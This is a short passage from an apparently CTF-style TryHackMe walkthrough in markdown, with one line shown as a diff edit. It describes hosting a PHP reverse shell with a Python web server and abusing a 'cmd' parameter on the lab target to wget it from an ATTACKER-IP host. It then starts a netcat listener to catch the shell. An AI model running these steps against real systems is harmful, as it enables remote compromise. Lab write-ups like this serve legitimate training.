darthturgle1/TryHackMe_Walkthroughs/UA_High.md

 In the same directory, use `python3 -m http.server 80` so that your shell can be accessed through HTTP.

 Now, return to Firefox.
 You should still be viewing **http://ua.thm/assets/index.php?cmd=whoami**.
 Replace this with **http://ua.thm/assets/index.php?cmd=wget http://{ATTACKER-IP}/php-reverse-shell.php.** (Note that ATTACKER-IP should be replaced with the IP of your attacker machine.)
-In essence, we just used our remote command execution to download our shell onto the target machine.
+In essence, we just used our remote command execution to download our php onto the target machine.

 On your attacker machine, use `CTRL+C` to stop your Python server.
 Then enter `nc -nvlp 1234` to create a listener for your reverse shell.